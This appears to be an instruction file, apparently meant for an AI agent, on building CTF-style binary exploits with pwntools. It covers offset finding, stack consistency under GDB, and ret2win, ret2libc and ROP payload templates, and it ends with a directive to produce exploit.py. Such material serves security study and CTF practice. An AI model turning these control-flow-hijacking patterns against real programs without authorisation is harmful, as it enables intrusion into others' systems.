Exploit Development
Build working exploits based on vulnerability analysis.
Exploit Development Process
- •Start from template - Use
templates/exploit.py - •Find offset - Use cyclic pattern
- •Identify target - Win function, ROP chain, shellcode
- •Handle mitigations - Leak addresses if needed
- •Build payload - Padding + control flow hijack
- •Test locally - With and without GDB
- •Test remote - Adjust for remote environment
Stack Consistency (CRITICAL)
Always use fixed argv[0] and empty environment:
python
ARGV0 = "/pwn"
ENV = {}
def conn():
if args.GDB:
return gdb.debug([EXECUTABLE], env=ENV, argv=[ARGV0], gdbscript='...')
else:
return process([EXECUTABLE], env=ENV, argv=[ARGV0])
This ensures stack addresses match between normal run and GDB debug.
Finding Offset
python
# Generate pattern from pwn import cyclic, cyclic_find payload = cyclic(200) # After crash, find offset # In GDB: cyclic -l 0x61616168 offset = cyclic_find(0x61616168)
Common Payload Patterns
Simple ret2win
python
payload = b'A' * offset payload += p64(win_addr)
ret2win with alignment
python
payload = b'A' * offset payload += p64(ret_gadget) # 16-byte alignment payload += p64(win_addr)
ret2libc
python
payload = b'A' * offset payload += p64(ret_gadget) payload += p64(pop_rdi) payload += p64(binsh_addr) payload += p64(system_addr)
ROP with pwntools
python
rop = ROP(elf)
rop.call('function', [arg1, arg2])
payload = b'A' * offset + rop.chain()
Debugging Tips
- •
context.log_level = 'debug'for verbose output - •
gdb.attach(p)to attach to running process - •
pause()to stop and inspect - •Print addresses:
print(f"addr: {hex(addr)}")
Output
Produce exploit.py using the template.